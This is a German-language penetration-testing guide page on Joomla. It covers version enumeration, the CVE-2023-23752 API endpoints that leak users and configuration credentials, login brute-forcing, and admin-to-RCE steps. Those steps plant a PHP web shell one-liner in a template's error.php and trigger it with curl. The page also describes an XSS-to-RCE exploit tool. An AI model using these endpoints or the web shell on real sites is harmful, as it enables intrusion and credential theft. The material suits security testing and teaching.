Joomla
Joomla-Statistiken
Joomla sammelt einige anonyme Nutzungsstatistiken, wie die Verteilung der Joomla-, PHP- und Datenbankversionen sowie der verwendeten Serverbetriebssysteme in Joomla-Installationen. Diese Daten können über ihre öffentliche API abgefragt werden.
Enumeration
Discovery/Footprinting
Überprüfen Sie die Meta
robots.txt
README.txt
Version
In /administrator/manifests/files/joomla.xml können Sie die Version sehen.
In /language/en-GB/en-GB.xml können Sie die Version von Joomla abrufen.
In plugins/system/cache/cache.xml können Sie eine ungefähre Version sehen.
Automatisch
In 80,443 - Pentesting Web Methodology ist ein Abschnitt über CMS-Scanner, die Joomla scannen können.
API Unauthentifizierte Informationsoffenlegung:
Versionen von 4.0.0 bis 4.2.7 sind anfällig für unauthentifizierte Informationsoffenlegung (CVE-2023-23752), die Anmeldeinformationen und andere Informationen ausgibt.
Benutzer:
http://<host>/api/v1/users?public=true
Konfigurationsdatei:
http://<host>/api/index.php/v1/config/application?public=true
MSF-Modul: scanner/http/joomla_api_improper_access_checks
oder Ruby-Skript: 51334
Brute-Force
Sie können dieses Skript verwenden, um zu versuchen, sich mit Brute-Force in das Login einzuloggen.
RCE
Wenn Sie es geschafft haben, Admin-Anmeldeinformationen zu erhalten, können Sie RCE darin erreichen, indem Sie einen Ausschnitt von PHP-Code hinzufügen, um RCE zu erlangen. Wir können dies tun, indem wir ein Template anpassen.
Klicken Sie auf
Templates
unten links unterConfiguration
, um das Template-Menü zu öffnen.Klicken Sie auf einen Template-Namen. Wählen wir
protostar
unter der SpaltenüberschriftTemplate
. Dies bringt uns zur SeiteTemplates: Customise
.Schließlich können Sie auf eine Seite klicken, um den Seitenquelltext anzuzeigen. Wählen wir die
error.php
-Seite. Wir fügen eine PHP-Einzeiler hinzu, um Codeausführung zu erlangen wie folgt:system($_GET['cmd']);
Speichern & Schließen
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
Von XSS zu RCE
JoomSploit: Joomla-Ausnutzungsskript, das XSS zu RCE oder anderen kritischen Schwachstellen erhöht. Für weitere Informationen siehe diesen Beitrag. Es bietet Unterstützung für Joomla-Versionen 5.X.X, 4.X.X und 3.X.X und ermöglicht:
Privilegieneskalation: Erstellt einen Benutzer in Joomla.
(RCE) Eingebaute Templates bearbeiten: Bearbeitet eingebaute Templates in Joomla.
(Custom) Benutzerdefinierte Exploits: Benutzerdefinierte Exploits für Drittanbieter-Joomla-Plugins.
Last updated